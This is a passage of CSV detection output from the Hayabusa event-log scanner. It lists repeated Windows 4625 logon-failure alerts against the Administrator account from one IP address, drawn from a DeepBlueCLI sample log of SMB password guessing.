NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dJFj6Ckw1HdK9w52 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Qqu3Im4HXQNyGnYm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bk5dmjQDnpSlREum : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.279 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pk4BvYgXBR2whf80 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i6n1su2TUr7ONQr4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: givsEAGfG0smN9Re : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i2YuM0i7a2QuY7xb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.470 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xuocQPZpd91adY0E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PvGB1dZrfDWyZoqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w4oi8iL88rJo7g2Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cF3OUnytXi4NjvqB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WKkJcp3TYj31iJUM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G0E44RVqAE1feU0b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ny5LCb1qOIUhxOPY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9jcDgzzqH26DjQ1k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yil94cFkU6UP24SK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bkdVHF3vggCcuNdn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4dRRI2CS3aVIX4nX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: chDZq3VgxIE2mRb9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.046 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HLVvgMmqLXKZADON : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i4avO2AJSlNb0IUL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mdo5CvycGvGhn33y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.171 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: heJfjLl1vbX6lMjZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wOP1E6hd4Jtj4gob : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xa7kMCNz0bEGTBqX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HSxTQ4HsZt2DeYVe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YxHpSQwFSV4hveVM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n3OwzSPomxZLoCe6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e9IfwDZIfYT6A50K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.463 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JOf6DbRX4zlNqLdb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 00kXrnJNH40NyoYL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nsNHcb9pnpdRgeL7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ucMhgxMXy9Ch1jNm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cfi3ZaLTECJgjM9x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: usugjEEBHlhJvOyu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WQ1pM2CVLt5ITVD5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.746 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NIboW7hNljF3HPpk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rOk5W4rkSYRRw4xS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AJTfcwd8rnFc06iF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.930 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6sm415W5zkvjdnTV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KEiSbtlmW4ou1mc7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xWeZV5pHt94adwUy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5np7HeCPAFTDdTXJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gXbe2jEJVtwaQXlr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7hZFiUCJnaBdHcw4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a71wyo41KV1ZoT7p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ogB17WdeOiC19rqn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.286 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ANOLPWG12lkW39Ei : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y1vf7OUxb6TH3Q4H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bxU5yumSieUzSgzH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v9K5EoWWASU8SlSe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PwZLRPFxaFWwjZEe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8fXgFFb3HTMunsoi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R1RozAr1uhux4cYW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.586 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n7EmuUSv03RnhKsF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jw410HEW8EC3MC9f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UTYp8cEbt3Yggo3J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.727 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yWJVzgYLWIo7SGCZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DP13jPdW5Gdl8z56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LNXOWjHmMDhfFVon : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kka1RiF3f7Nhkf8x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.959 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2o90lG6attzWU4ZN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.998 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PyPK9kuJdflQ4RKe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.028 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a9I3El7d7anR0kIz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eDUMTEfNhFuuqMle : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e0F70d1WstkqnQgA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bm0txApQSp1U42N3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JeEe5ENSIZnfc3FG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oasE54Z1FlpswY0d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bhje1BgvxOlG28JM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L9iTIv4UQ4En9RA2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.356 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mg8KFm1lCeImj8Sb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h17Fz1s6GJki61jg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Pjjn4FAkJn4h32r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.483 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ARVx3FAAww8Gmfvc : IP Address: 192.168.198.149 : AuthPackage: 